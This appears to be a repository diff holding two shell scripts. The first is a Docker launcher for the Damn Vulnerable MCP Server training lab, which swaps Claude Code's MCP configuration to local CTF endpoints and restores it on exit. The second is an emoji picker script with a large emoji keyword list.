    printf '%b\n' " ${CYAN}start${NC} Start DVMCP server"
    printf '%b\n' " ${CYAN}stop${NC} Stop DVMCP server"
    printf '%b\n' " ${CYAN}restart${NC} Restart DVMCP server"
    printf '%b\n' " ${CYAN}status${NC} Check if running"
    printf '%b\n' " ${CYAN}logs${NC} Show container logs"
    printf '%b\n' " ${CYAN}shell${NC} Open shell in container"
    printf '\n'
    printf '%b\n' "${BOLD}EXAMPLES:${NC}"
    printf '%s\n' " dvmcp build # Build image (first time setup)"
    printf '%s\n' " dvmcp start # Launch DVMCP server"
    printf '%s\n' " dvmcp stop # Stop DVMCP server"
    printf '%s\n' " dvmcp logs # View logs"
    printf '\n'
    printf '%b\n' "${BOLD}ACCESS:${NC}"
    printf '%b\n' " Ports: ${BOLD}9001-9010${NC} (10 challenge instances)"
    printf '%b\n' " Test: ${BOLD}curl http://localhost:9001${NC}"
    printf '\n'
    printf '%b\n' "${BOLD}ABOUT:${NC}"
    printf '%s\n' " Damn Vulnerable MCP Server - Intentionally vulnerable MCP implementation"
    printf '%s\n' " Perfect for testing MCP security vulnerabilities"
    printf '%s\n' " GitHub: https://github.com/harishsg993010/damn-vulnerable-MCP-server"
    printf '\n'
    printf '%b\n' "${BOLD}SECURITY:${NC}"
    printf '%s\n' " This script automatically manages Claude Code config isolation:"
    printf '%b\n' " - ${GREEN}start${NC}: Backs up production config, loads CTF-only config"
    printf '%b\n' " - ${GREEN}stop${NC}: Restores production config automatically"
    printf '%b\n' " - ${YELLOW}Your production MCP servers are protected${NC}"
    printf '\n'
    printf '%b\n' "${BOLD}FIRST TIME SETUP:${NC}"
    printf '%s\n' " 1. Clone repo: git clone https://github.com/harishsg993010/damn-vulnerable-MCP-server.git"
    printf '%s\n' " 2. cd damn-vulnerable-MCP-server/"
    printf '%s\n' " 3. Build: dvmcp build"
    printf '%s\n' " 4. Start: dvmcp start"
    printf '%b\n' " 5. ${BOLD}Restart Claude Code${NC} to load CTF config"
}
||||
|
||||
# Abort early with a clear error when the docker CLI is not installed.
check_docker() {
    command -v docker &>/dev/null && return 0
    echo -e "${RED}Error:${NC} Docker not installed"
    exit 1
}
||||
|
||||
# Return 0 iff the dvmcp:latest image is present locally.
check_image_exists() {
    docker images --format '{{.Repository}}:{{.Tag}}' | grep -q "^${IMAGE}$"
}
||||
|
||||
# Write the CTF-only Claude Code config (one MCP server entry per challenge
# port, 9001-9010) if it does not already exist. The heredoc delimiter is
# quoted, so the JSON is written literally with no shell expansion.
create_ctf_config_template() {
    if [[ ! -f "$CTF_CONFIG" ]]; then
        echo -e "${CYAN}[*]${NC} Creating CTF config template at ${CTF_CONFIG}..."
        cat > "$CTF_CONFIG" <<'EOF'
{
  "mcpServers": {
    "Challenge 1": {
      "command": "npx",
      "args": ["mcp-remote", "http://127.0.0.1:9001/sse"]
    },
    "Challenge 2": {
      "command": "npx",
      "args": ["mcp-remote", "http://127.0.0.1:9002/sse"]
    },
    "Challenge 3": {
      "command": "npx",
      "args": ["mcp-remote", "http://127.0.0.1:9003/sse"]
    },
    "Challenge 4": {
      "command": "npx",
      "args": ["mcp-remote", "http://127.0.0.1:9004/sse"]
    },
    "Challenge 5": {
      "command": "npx",
      "args": ["mcp-remote", "http://127.0.0.1:9005/sse"]
    },
    "Challenge 6": {
      "command": "npx",
      "args": ["mcp-remote", "http://127.0.0.1:9006/sse"]
    },
    "Challenge 7": {
      "command": "npx",
      "args": ["mcp-remote", "http://127.0.0.1:9007/sse"]
    },
    "Challenge 8": {
      "command": "npx",
      "args": ["mcp-remote", "http://127.0.0.1:9008/sse"]
    },
    "Challenge 9": {
      "command": "npx",
      "args": ["mcp-remote", "http://127.0.0.1:9009/sse"]
    },
    "Challenge 10": {
      "command": "npx",
      "args": ["mcp-remote", "http://127.0.0.1:9010/sse"]
    }
  }
}
EOF
        echo -e "${GREEN}✓${NC} CTF config created"
    fi
}
||||
|
||||
# Back up the production Claude config and activate the CTF-only config.
# Idempotent: a state file marks that the swap already happened.
swap_to_ctf_config() {
    if [[ ! -f "$PROD_CONFIG" ]]; then
        echo -e "${RED}Error:${NC} Production config not found at ${PROD_CONFIG}"
        exit 1
    fi

    # Already swapped? Nothing to do.
    if [[ -f "$CONFIG_STATE_FILE" ]]; then
        echo -e "${YELLOW}⚠${NC} Already in CTF mode"
        return 0
    fi

    # Make sure the CTF config exists before we point Claude at it.
    create_ctf_config_template

    echo -e "${CYAN}[*]${NC} Backing up production config..."
    cp "$PROD_CONFIG" "$BACKUP_CONFIG"

    echo -e "${CYAN}[*]${NC} Switching to CTF config..."
    cp "$CTF_CONFIG" "$PROD_CONFIG"

    # Persist the mode so stop/cleanup know to restore.
    echo "CTF_MODE_ACTIVE" > "$CONFIG_STATE_FILE"

    echo -e "${GREEN}✓${NC} Switched to CTF config"
    echo -e "${YELLOW}Note:${NC} Production MCP servers are disabled until you stop DVMCP"
}
||||
|
||||
# Put the backed-up production config back in place and clear CTF state.
# No-op when the state file says we are not in CTF mode.
restore_prod_config() {
    if [[ ! -f "$CONFIG_STATE_FILE" ]]; then
        echo -e "${YELLOW}⚠${NC} Already using production config"
        return 0
    fi

    # We are in CTF mode but the backup vanished: refuse to clobber anything.
    if [[ ! -f "$BACKUP_CONFIG" ]]; then
        echo -e "${RED}Error:${NC} Backup config not found at ${BACKUP_CONFIG}"
        echo -e "${YELLOW}Warning:${NC} Cannot restore production config!"
        exit 1
    fi

    echo -e "${CYAN}[*]${NC} Restoring production config..."
    cp "$BACKUP_CONFIG" "$PROD_CONFIG"

    # Drop the backup and the CTF-mode marker together.
    rm -f "$BACKUP_CONFIG" "$CONFIG_STATE_FILE"

    echo -e "${GREEN}✓${NC} Production config restored"
}
||||
|
||||
# EXIT/INT/TERM trap: if the script dies while the CTF config is active,
# restore the production config so Claude Code is never left isolated.
cleanup_on_exit() {
    [[ -f "$CONFIG_STATE_FILE" ]] || return 0
    echo
    echo -e "${YELLOW}[!]${NC} Script interrupted, restoring production config..."
    restore_prod_config
}

# Register cleanup trap
trap cleanup_on_exit EXIT INT TERM
||||
|
||||
# Build the dvmcp:latest image from a Dockerfile in the current directory.
build_dvmcp() {
    # The repo checkout (with its Dockerfile) must be the working directory.
    if [[ ! -f "Dockerfile" ]]; then
        echo -e "${RED}Error:${NC} Dockerfile not found in current directory"
        echo
        echo -e "${YELLOW}Expected location:${NC} ./Dockerfile"
        echo
        echo -e "${CYAN}To build the image:${NC}"
        echo " 1. cd ~/path/to/damn-vulnerable-MCP-server/"
        echo " 2. Run: dvmcp build"
        echo
        echo -e "${CYAN}Or clone the repo:${NC}"
        echo " git clone https://github.com/harishsg993010/damn-vulnerable-MCP-server.git"
        exit 1
    fi

    echo -e "${CYAN}[*]${NC} Building DVMCP Docker image..."
    echo -e "${YELLOW}Note:${NC} This may take several minutes..."

    if docker build -t "$IMAGE" . ; then
        echo -e "${GREEN}✓${NC} DVMCP image built successfully"
        echo -e "${CYAN}[*]${NC} You can now run: ${BOLD}dvmcp start${NC}"
    else
        echo -e "${RED}✗${NC} Build failed"
        exit 1
    fi
}
||||
|
||||
# Start (or create) the DVMCP container after isolating the Claude config.
# Publishes challenge ports 9001-9010 and prints the access list.
start_dvmcp() {
    local publish=() p

    if ! check_image_exists; then
        echo -e "${RED}Error:${NC} DVMCP image not found"
        echo -e "${YELLOW}Run:${NC} ${BOLD}dvmcp build${NC} first"
        exit 1
    fi

    # Swap to CTF config BEFORE starting the container.
    swap_to_ctf_config
    echo

    if docker ps -a --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
        if docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
            echo -e "${YELLOW}⚠${NC} DVMCP already running"
            echo -e "${CYAN}[*]${NC} Access at: ${BOLD}http://localhost:9001-9010${NC}"
            return 0
        fi
        # Container exists but is stopped: just restart it.
        echo -e "${CYAN}[*]${NC} Starting existing container..."
        docker start "$CONTAINER_NAME"
    else
        echo -e "${CYAN}[*]${NC} Starting DVMCP server..."
        echo -e "${YELLOW}Note:${NC} Mapping ports 9001-9010 for challenge instances"
        # Build the -p 900X:900X flags in a loop rather than ten literals.
        for p in {9001..9010}; do
            publish+=(-p "${p}:${p}")
        done
        docker run -d --name "$CONTAINER_NAME" "${publish[@]}" "$IMAGE"
    fi

    # Give the container a moment to come up before declaring success.
    sleep 3

    echo -e "${GREEN}✓${NC} DVMCP server started"
    echo
    echo -e "${BOLD}Challenge Instances:${NC}"
    for p in {9001..9010}; do
        echo -e " ${CYAN}Port ${p}:${NC} http://localhost:${p}"
    done
    echo
    echo -e "${YELLOW}Tip:${NC} Test with: ${BOLD}curl http://localhost:9001${NC}"
    echo -e "${YELLOW}Security:${NC} ${GREEN}Production MCP servers isolated${NC}"
    echo
    echo -e "${BOLD}⚠ IMPORTANT:${NC} Restart Claude Code to load CTF config"
}
||||
|
||||
# Stop the DVMCP container (if running), then always restore the production
# Claude config.
stop_dvmcp() {
    if docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
        echo -e "${CYAN}[*]${NC} Stopping DVMCP server..."
        docker stop "$CONTAINER_NAME"
        echo -e "${GREEN}✓${NC} DVMCP server stopped"
    else
        echo -e "${YELLOW}⚠${NC} DVMCP not running"
    fi

    # Restore production config AFTER stopping the container.
    echo
    restore_prod_config
    echo
    echo -e "${BOLD}⚠ IMPORTANT:${NC} Restart Claude Code to load production config"
}
||||
|
||||
# Full stop/start cycle with a short pause in between.
restart_dvmcp() {
    stop_dvmcp
    sleep 2
    start_dvmcp
}
||||
|
||||
# Report container state (ports + docker ps row) and which Claude config
# (CTF vs production) is currently active.
show_status() {
    if docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
        echo -e "${GREEN}●${NC} DVMCP server is ${GREEN}running${NC}"
        echo
        echo -e "${BOLD}Active Ports:${NC}"
        docker port "$CONTAINER_NAME" 2>/dev/null | while IFS= read -r line; do
            echo -e " ${CYAN}${line}${NC}"
        done
        echo
        docker ps --format "table {{.Names}}\t{{.Status}}\t{{.Ports}}" | grep -E "(NAMES|${CONTAINER_NAME})"
    else
        echo -e "${RED}●${NC} DVMCP server is ${RED}stopped${NC}"
        # Hint at first-time setup when the image was never built.
        if ! check_image_exists; then
            echo
            echo -e "${YELLOW}Note:${NC} Image not built yet. Run: ${BOLD}dvmcp build${NC}"
        fi
    fi

    echo
    echo -e "${BOLD}Config Status:${NC}"
    if [[ -f "$CONFIG_STATE_FILE" ]]; then
        echo -e " ${CYAN}Mode:${NC} CTF (isolated)"
        echo -e " ${CYAN}Active:${NC} ${CTF_CONFIG}"
        echo -e " ${CYAN}Backup:${NC} ${BACKUP_CONFIG}"
    else
        echo -e " ${CYAN}Mode:${NC} Production"
        echo -e " ${CYAN}Active:${NC} ${PROD_CONFIG}"
    fi
}
||||
|
||||
# Follow the container's logs; errors out if the server is not running.
show_logs() {
    if ! docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
        echo -e "${RED}Error:${NC} DVMCP server not running"
        exit 1
    fi
    docker logs -f "$CONTAINER_NAME"
}
||||
|
||||
# Exec an interactive shell in the running container (bash, falling back
# to sh for minimal images).
open_shell() {
    if ! docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
        echo -e "${RED}Error:${NC} DVMCP server not running"
        exit 1
    fi
    echo -e "${CYAN}[*]${NC} Opening shell in DVMCP container..."
    docker exec -it "$CONTAINER_NAME" /bin/bash || docker exec -it "$CONTAINER_NAME" /bin/sh
}
|
||||
# --- Entry point ---------------------------------------------------------
check_docker

# No arguments or a help flag: print usage and stop.
if [[ $# -eq 0 ]] || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
    show_help
    exit 0
fi

case "$1" in
    build)         build_dvmcp ;;
    start|up)      start_dvmcp ;;
    stop|down)     stop_dvmcp ;;
    restart)       restart_dvmcp ;;
    status)        show_status ;;
    logs)          show_logs ;;
    shell|sh|bash) open_shell ;;
    *)
        echo -e "${RED}Error:${NC} Unknown command: $1"
        echo "Run 'dvmcp --help' for usage"
        exit 1
        ;;
esac
||||
552
scripts/emoji
Executable file
552
scripts/emoji
Executable file
|
|
@ -0,0 +1,552 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: emoji
|
||||
# Description: Interactive emoji picker with fuzzy search
|
||||
# Source: Inspired by https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
|
||||
# Usage: emoji # interactive picker
|
||||
# emoji smile # search for "smile"
|
||||
|
||||
# Curated emoji database (emoji + keywords)
|
||||
emojis="😀 grinning face grin happy smile teeth cheerful
|
||||
😃 smiley smile happy face open mouth teeth yay
|
||||
😄 smile happy face grin laugh grinning eyes closed
|
||||
😁 beaming smile happy grin teeth eyes closed
|
||||
😆 laughing haha hahaha lol rofl laugh grinning squinting
|
||||
😅 grinning sweat relief phew close call nervous laugh
|
||||
🤣 rolling floor rofl laugh crying funny hilarious
|
||||
😂 tears joy laugh cry funny lol crying
|
||||
🙂 slightly smiling smile happy nice
|
||||
🙃 upside down smile sarcastic silly
|
||||
😉 wink flirt winky playful tease
|
||||
😊 smiling eyes smile happy blush shy
|
||||
😇 smiling halo angel innocent saint good
|
||||
🥰 smiling hearts love adore crush hearts eyes
|
||||
😍 heart eyes love crush hearts smiling loving
|
||||
🤩 star eyes starstruck excited wow amazed
|
||||
😘 blowing kiss love smooch mwah
|
||||
😗 kissing smile kiss puckered
|
||||
☺️ smiling face blushing happy relaxed
|
||||
😚 kissing closed eyes kiss affection
|
||||
😙 kissing smiling eyes kiss happy
|
||||
🥲 smiling tear touched grateful sad happy bittersweet
|
||||
😋 yummy delicious tasty savoring food yum
|
||||
😛 tongue playful silly teasing
|
||||
😜 winking tongue playful teasing kidding
|
||||
🤪 zany crazy wild silly wacky goofy
|
||||
😝 squinting tongue playful teasing horrible taste
|
||||
🤑 money mouth dollar rich greedy cash
|
||||
🤗 hugging hug embrace care support
|
||||
🤭 hand mouth oops giggle secret tee hee
|
||||
🫢 eyes hand peeking surprised shocked
|
||||
🫣 peeking through fingers scared peek boo hide
|
||||
🤫 shushing shh quiet secret silence hush
|
||||
🤔 thinking hmm wonder ponder contemplative
|
||||
🫡 salute respect military yes sir
|
||||
🤐 zipper mouth secret sealed silent quiet
|
||||
🤨 raised eyebrow skeptical suspicious doubt questioning
|
||||
😐 neutral face blank expressionless meh
|
||||
😑 expressionless annoyed blank dead inside
|
||||
😶 no mouth quiet silent speechless
|
||||
🫥 dotted line invisible disappearing transparent
|
||||
😶🌫️ face clouds confused foggy unclear
|
||||
😏 smirking smirk sly confident knowing
|
||||
😒 unamused annoyed unimpressed disappointed meh
|
||||
🙄 rolling eyes annoyed duh whatever sarcastic
|
||||
😬 grimacing awkward uncomfortable eek cringe teeth
|
||||
😮💨 exhaling sigh relief phew tired
|
||||
🤥 lying pinocchio lie nose growing
|
||||
🫨 shaking vibrating earthquake scared nervous
|
||||
😌 relieved calm peaceful content relaxed
|
||||
😔 pensive sad disappointed dejected down
|
||||
😪 sleepy tired yawn exhausted drowsy
|
||||
🤤 drooling hungry desire want covet
|
||||
😴 sleeping sleep zzz asleep tired snooze
|
||||
😷 face mask sick ill medical doctor protection
|
||||
🤒 thermometer sick ill fever temperature
|
||||
🤕 head bandage hurt injured wounded ow
|
||||
🤢 nauseated sick queasy gross disgusted
|
||||
🤮 vomiting puke sick throw up barf
|
||||
🤧 sneezing gesundheit achoo sick cold allergies
|
||||
🥵 hot face heat sweating fever burning
|
||||
🥶 cold face freezing frozen ice chilly
|
||||
🥴 woozy dizzy drunk tipsy disoriented confused
|
||||
😵 dizzy face knocked out stunned shocked
|
||||
😵💫 spiral eyes dizzy hypnotized dazed confused
|
||||
🤯 exploding head mind blown shocked amazed
|
||||
🤠 cowboy hat yee haw western
|
||||
🥳 party celebrating birthday festive celebration confetti
|
||||
🥸 disguise glasses nose mustache incognito spy
|
||||
😎 sunglasses cool awesome rad shades
|
||||
🤓 nerd geek smart glasses studious
|
||||
🧐 monocle fancy classy rich thinking posh
|
||||
😕 confused puzzled uncertain huh what
|
||||
🫤 diagonal mouth meh unsure uncertain
|
||||
😟 worried anxious concerned nervous afraid
|
||||
🙁 slightly frowning sad disappointed unhappy
|
||||
☹️ frowning sad upset disappointed down
|
||||
😮 open mouth shocked surprised wow oh
|
||||
😯 hushed surprised quiet wow shocked
|
||||
😲 astonished shocked amazed surprised stunned gasping
|
||||
😳 flushed embarrassed shy blush awkward
|
||||
🥺 pleading puppy eyes begging please sad mercy
|
||||
🥹 holding tears grateful touched emotional moved
|
||||
😦 frowning open mouth shocked worried concerned
|
||||
😧 anguished distressed worried scared oh no
|
||||
😨 fearful scared afraid anxious fear
|
||||
😰 anxious sweat nervous worried stressed cold sweat
|
||||
😥 sad relieved phew sweat disappointed but relieved
|
||||
😢 crying sad tear upset depressed
|
||||
😭 loudly crying sobbing bawling devastated
|
||||
😱 screaming fear shocked scared horrified scream
|
||||
😖 confounded frustrated scrunched upset confused
|
||||
😣 persevering struggling persevere powering through
|
||||
😞 disappointed sad unhappy let down dejected
|
||||
😓 downcast sweat sad worried stressed defeated
|
||||
😩 weary exhausted tired fed up frustrated
|
||||
😫 tired exhausted fed up frustrated stressed
|
||||
🥱 yawning tired bored sleepy boring exhausted
|
||||
😤 triumph victory proud won huffing
|
||||
😡 angry mad furious enraged pouting
|
||||
😠 angry mad annoyed frustrated upset
|
||||
🤬 cursing swearing profanity symbols angry fuck
|
||||
😈 smiling horns devil mischievous naughty evil
|
||||
👿 angry horns devil mad evil angry purple
|
||||
💀 skull dead death dying funny died
|
||||
☠️ skull crossbones poison danger pirate deadly
|
||||
💩 pile poo poop shit turd crap
|
||||
🤡 clown joker funny creepy circus
|
||||
👹 ogre monster oni demon red scary
|
||||
👺 goblin monster oni demon tengu red nose
|
||||
👻 ghost boo spooky halloween phantom
|
||||
👽 alien extraterrestrial et space ufo
|
||||
👾 alien monster space invader video game retro
|
||||
🤖 robot bot ai machine automation
|
||||
😺 grinning cat happy cat smiling feline
|
||||
😸 grinning cat smiling eyes happy feline
|
||||
😹 cat tears joy laughing funny cat
|
||||
😻 cat heart eyes love smiling adore
|
||||
😼 cat wry smile smirking sly cat
|
||||
😽 kissing cat love kiss affection
|
||||
🙀 weary cat surprised shocked scared screaming
|
||||
😿 crying cat sad tear upset
|
||||
😾 pouting cat angry grumpy annoyed mad
|
||||
🙈 see no evil monkey blind ignore cover eyes
|
||||
🙉 hear no evil monkey deaf ignore cover ears
|
||||
🙊 speak no evil monkey silence quiet shh cover mouth
|
||||
💋 kiss lips kissing love smooch
|
||||
💌 love letter heart mail valentine romance
|
||||
💘 heart arrow cupid love valentine romance
|
||||
💝 heart ribbon gift present love valentine
|
||||
💖 sparkling heart love sparkle shine
|
||||
💗 growing heart love expanding bigger
|
||||
💓 beating heart love heartbeat pulse
|
||||
💞 revolving hearts love two hearts circling
|
||||
💕 two hearts love romance pair couple
|
||||
💟 heart decoration love ornament purple white
|
||||
❣️ heart exclamation love emphasis
|
||||
💔 broken heart heartbreak sad breakup hurt
|
||||
❤️🔥 heart fire burning love passion flames
|
||||
❤️🩹 mending heart healing recovery bandaged
|
||||
❤️ red heart love valentine romance classic
|
||||
🩷 pink heart love soft cute gentle
|
||||
🧡 orange heart love friendship care
|
||||
💛 yellow heart love happiness friendship
|
||||
💚 green heart love nature jealous
|
||||
💙 blue heart love trust calm loyal
|
||||
🩵 light blue heart love peace calm soft
|
||||
💜 purple heart love compassion sensitivity
|
||||
🤎 brown heart love earth natural
|
||||
🖤 black heart dark sad evil goth
|
||||
🩶 grey heart love neutral indifferent
|
||||
🤍 white heart love pure clean innocent
|
||||
💯 hundred perfect 100 score full keep it 💯
|
||||
💢 anger symbol mad angry frustrated
|
||||
💥 collision bang boom crash pow explosion
|
||||
💫 dizzy stars sparkles dazed seeing stars
|
||||
💦 sweat droplets water splash wet
|
||||
💨 dashing dash wind fast smoke puff gone
|
||||
🕳️ hole pit gap void empty opening
|
||||
💬 speech balloon talk chat speaking
|
||||
👁️🗨️ eye speech bubble witness i see attention
|
||||
🗨️ left speech bubble chat talk dialog
|
||||
🗯️ right anger bubble mad shout yell
|
||||
💭 thought balloon thinking wondering daydream
|
||||
💤 zzz sleeping sleep snore tired
|
||||
👋 waving hand hi hello goodbye wave bye
|
||||
🤚 raised back hand stop wait hold on
|
||||
🖐️ hand fingers splayed five stop high five
|
||||
✋ raised hand stop halt wait high five
|
||||
🖖 vulcan salute spock star trek live long prosper
|
||||
🫱 rightwards hand pointing right offer
|
||||
🫲 leftwards hand pointing left offer
|
||||
🫳 palm down hand drop dismiss
|
||||
🫴 palm up hand offering receive give
|
||||
🫷 leftwards pushing hand stop reject push
|
||||
🫸 rightwards pushing hand stop reject push
|
||||
👌 ok hand okay perfect good chef kiss
|
||||
🤌 pinched fingers italian gesture what
|
||||
🤏 pinching hand tiny small little bit
|
||||
✌️ victory hand peace sign v two
|
||||
🤞 crossed fingers luck wish hope good luck
|
||||
🫰 hand index thumb snap click money pay
|
||||
🤟 love you hand sign i love you
|
||||
🤘 sign horns rock metal devil horns
|
||||
🤙 call me hand phone shaka hang loose
|
||||
👈 backhand index pointing left left that
|
||||
👉 backhand index pointing right right that
|
||||
👆 backhand index pointing up up above that
|
||||
🖕 middle finger fuck you rude profanity flip off
|
||||
👇 backhand index pointing down down below that
|
||||
☝️ index pointing up one attention above
|
||||
🫵 index pointing you your attention
|
||||
👍 thumbs up good yes like approve agree
|
||||
👎 thumbs down bad no dislike disapprove disagree
|
||||
✊ raised fist power solidarity resistance punch
|
||||
👊 oncoming fist punch bump fist bump bro
|
||||
🤛 left facing fist punch bump fist bump
|
||||
🤜 right facing fist punch bump fist bump
|
||||
👏 clapping hands applause clap bravo good job
|
||||
🙌 raising hands celebration praise yay hooray hallelujah
|
||||
🫶 heart hands love support care fingers
|
||||
👐 open hands hug embrace jazz hands
|
||||
🤲 palms together pray please namaste dua
|
||||
🤝 handshake deal agreement hello meeting shake
|
||||
🙏 folded hands pray thank you please thanks namaste
|
||||
✍️ writing hand writing write author pen
|
||||
💅 nail polish nails beauty makeup manicure slay
|
||||
🤳 selfie camera photo picture self portrait
|
||||
💪 flexed biceps strong muscle strength flex gym
|
||||
🦾 mechanical arm prosthetic cyborg robot strong
|
||||
🦿 mechanical leg prosthetic cyborg robot
|
||||
🦵 leg kick limb
|
||||
🦶 foot step kick toe
|
||||
👂 ear hearing listen sound
|
||||
🦻 ear hearing aid deaf listen
|
||||
👃 nose smell sniff scent
|
||||
🧠 brain smart intelligent think mind
|
||||
🫀 anatomical heart real heart organ medical
|
||||
🫁 lungs breathing respiratory organ medical
|
||||
🦷 tooth teeth dentist dental smile
|
||||
🦴 bone skeleton fossil
|
||||
👀 eyes looking watching see stare observe
|
||||
👁️ eye looking watching see vision
|
||||
👅 tongue lick taste silly
|
||||
👄 mouth lips kiss kissing speaking
|
||||
🫦 biting lip nervous anxious flirting
|
||||
👶 baby infant newborn child young
|
||||
🧒 child kid young boy girl
|
||||
👦 boy child kid young male
|
||||
👧 girl child kid young female
|
||||
🧑 person human adult gender neutral
|
||||
👱 blond person blonde hair fair
|
||||
👨 man male adult guy dude gentleman
|
||||
🧔 bearded person beard facial hair
|
||||
🧔♂️ man beard facial hair
|
||||
🧔♀️ woman beard facial hair
|
||||
👨🦰 man red hair ginger
|
||||
👨🦱 man curly hair
|
||||
👨🦳 man white hair old elderly
|
||||
👨🦲 man bald no hair
|
||||
👩 woman female adult lady
|
||||
👩🦰 woman red hair ginger
|
||||
👩🦱 woman curly hair
|
||||
👩🦳 woman white hair old elderly
|
||||
👩🦲 woman bald no hair
|
||||
🧓 older adult elderly senior old
|
||||
👴 old man elderly grandfather senior
|
||||
👵 old woman elderly grandmother senior
|
||||
🙍 person frowning sad upset disappointed
|
||||
🙍♂️ man frowning sad upset
|
||||
🙍♀️ woman frowning sad upset
|
||||
🙎 person pouting angry mad annoyed
|
||||
🙎♂️ man pouting angry mad
|
||||
🙎♀️ woman pouting angry mad
|
||||
🙅 person gesturing no nope stop
|
||||
🙅♂️ man gesturing no nope stop
|
||||
🙅♀️ woman gesturing no nope stop
|
||||
🙆 person gesturing ok okay yes
|
||||
🙆♂️ man gesturing ok okay yes
|
||||
🙆♀️ woman gesturing ok okay yes
|
||||
💁 person tipping hand information sass
|
||||
💁♂️ man tipping hand information
|
||||
💁♀️ woman tipping hand information sass
|
||||
🙋 person raising hand question attention pick me
|
||||
🙋♂️ man raising hand question
|
||||
🙋♀️ woman raising hand question
|
||||
🧏 deaf person sign language deaf
|
||||
🧏♂️ deaf man sign language
|
||||
🧏♀️ deaf woman sign language
|
||||
🙇 person bowing sorry thank you respect
|
||||
🙇♂️ man bowing sorry respect
|
||||
🙇♀️ woman bowing sorry respect
|
||||
🤦 person facepalming facepalm frustrated duh disappointed
|
||||
🤦♂️ man facepalming facepalm frustrated
|
||||
🤦♀️ woman facepalming facepalm frustrated
|
||||
🤷 person shrugging idk dunno shrug don't know whatever
|
||||
🤷♂️ man shrugging idk dunno
|
||||
🤷♀️ woman shrugging idk dunno
|
||||
🧑⚕️ health worker doctor nurse medical
|
||||
👨⚕️ man health worker doctor
|
||||
👩⚕️ woman health worker doctor nurse
|
||||
🧑🎓 student school college university
|
||||
👨🎓 man student graduate
|
||||
👩🎓 woman student graduate
|
||||
🧑🏫 teacher professor educator
|
||||
👨🏫 man teacher professor
|
||||
👩🏫 woman teacher professor
|
||||
🧑⚖️ judge law legal court justice
|
||||
👨⚖️ man judge law
|
||||
👩⚖️ woman judge law
|
||||
🧑🌾 farmer agriculture crops
|
||||
👨🌾 man farmer agriculture
|
||||
👩🌾 woman farmer agriculture
|
||||
🧑🍳 cook chef cooking
|
||||
👨🍳 man cook chef
|
||||
👩🍳 woman cook chef
|
||||
🧑🔧 mechanic technician repair
|
||||
👨🔧 man mechanic technician
|
||||
👩🔧 woman mechanic technician
|
||||
🧑🏭 factory worker industrial
|
||||
👨🏭 man factory worker
|
||||
👩🏭 woman factory worker
|
||||
🧑💼 office worker business professional
|
||||
👨💼 man office worker business
|
||||
👩💼 woman office worker business
|
||||
🧑🔬 scientist research lab
|
||||
👨🔬 man scientist research
|
||||
👩🔬 woman scientist research
|
||||
🧑💻 technologist developer programmer coder hacker computer
|
||||
👨💻 man technologist developer programmer
|
||||
👩💻 woman technologist developer programmer
|
||||
🧑🎤 singer performer music artist
|
||||
👨🎤 man singer rockstar
|
||||
👩🎤 woman singer rockstar
|
||||
🧑🎨 artist painter creative
|
||||
👨🎨 man artist painter
|
||||
👩🎨 woman artist painter
|
||||
🧑✈️ pilot aviation plane flight
|
||||
👨✈️ man pilot aviation
|
||||
👩✈️ woman pilot aviation
|
||||
🧑🚀 astronaut space cosmonaut
|
||||
👨🚀 man astronaut space
|
||||
👩🚀 woman astronaut space
|
||||
🧑🚒 firefighter fire emergency
|
||||
👨🚒 man firefighter fire
|
||||
👩🚒 woman firefighter fire
|
||||
👮 police officer cop law enforcement
|
||||
👮♂️ man police officer cop
|
||||
👮♀️ woman police officer cop
|
||||
🕵️ detective spy investigator sleuth
|
||||
🕵️♂️ man detective spy
|
||||
🕵️♀️ woman detective spy
|
||||
💂 guard soldier royal british
|
||||
💂♂️ man guard soldier
|
||||
💂♀️ woman guard soldier
|
||||
🥷 ninja stealth assassin martial arts
|
||||
👷 construction worker builder hard hat
|
||||
👷♂️ man construction worker builder
|
||||
👷♀️ woman construction worker builder
|
||||
🫅 person crown royalty monarch king queen
|
||||
🤴 prince royalty nobility fairy tale
|
||||
👸 princess royalty nobility fairy tale
|
||||
👳 person turban wearing turban
|
||||
👳♂️ man turban wearing
|
||||
👳♀️ woman turban wearing
|
||||
👲 person skullcap cap hat chinese
|
||||
🧕 woman headscarf hijab muslim
|
||||
🤵 person tuxedo formal wedding groom
|
||||
🤵♂️ man tuxedo formal groom
|
||||
🤵♀️ woman tuxedo formal
|
||||
👰 person veil wedding bride marriage
|
||||
👰♂️ man veil wedding groom
|
||||
👰♀️ woman veil wedding bride
|
||||
🤰 pregnant woman expecting baby
|
||||
🫃 pregnant man trans expecting
|
||||
🫄 pregnant person expecting baby
|
||||
👼 baby angel cherub halo innocent
|
||||
🎅 santa claus christmas saint nick father christmas
|
||||
🤶 mrs claus christmas mother
|
||||
🧑🎄 mx claus christmas gender neutral
|
||||
🦸 superhero hero power super cape
|
||||
🦸♂️ man superhero hero
|
||||
🦸♀️ woman superhero hero
|
||||
🦹 supervillain villain evil bad
|
||||
🦹♂️ man supervillain villain
|
||||
🦹♀️ woman supervillain villain
|
||||
🧙 mage wizard witch magic sorcerer
|
||||
🧙♂️ man mage wizard sorcerer
|
||||
🧙♀️ woman mage witch sorceress
|
||||
🧚 fairy magic pixie sprite wings
|
||||
🧚♂️ man fairy magic
|
||||
🧚♀️ woman fairy magic pixie
|
||||
🧛 vampire dracula undead fangs blood
|
||||
🧛♂️ man vampire dracula
|
||||
🧛♀️ woman vampire dracula
|
||||
🧜 merperson mermaid merman ocean sea
|
||||
🧜♂️ merman triton ocean
|
||||
🧜♀️ mermaid ariel ocean
|
||||
🧝 elf fantasy magic legolas
|
||||
🧝♂️ man elf fantasy
|
||||
🧝♀️ woman elf fantasy
|
||||
🧞 genie magic wish lamp djinn
|
||||
🧞♂️ man genie magic
|
||||
🧞♀️ woman genie magic
|
||||
🧟 zombie undead walker brain dead
|
||||
🧟♂️ man zombie undead
|
||||
🧟♀️ woman zombie undead
|
||||
🧌 troll internet monster ugly
|
||||
💆 person getting massage spa relaxation
|
||||
💆♂️ man getting massage spa
|
||||
💆♀️ woman getting massage spa
|
||||
💇 person getting haircut salon barber
|
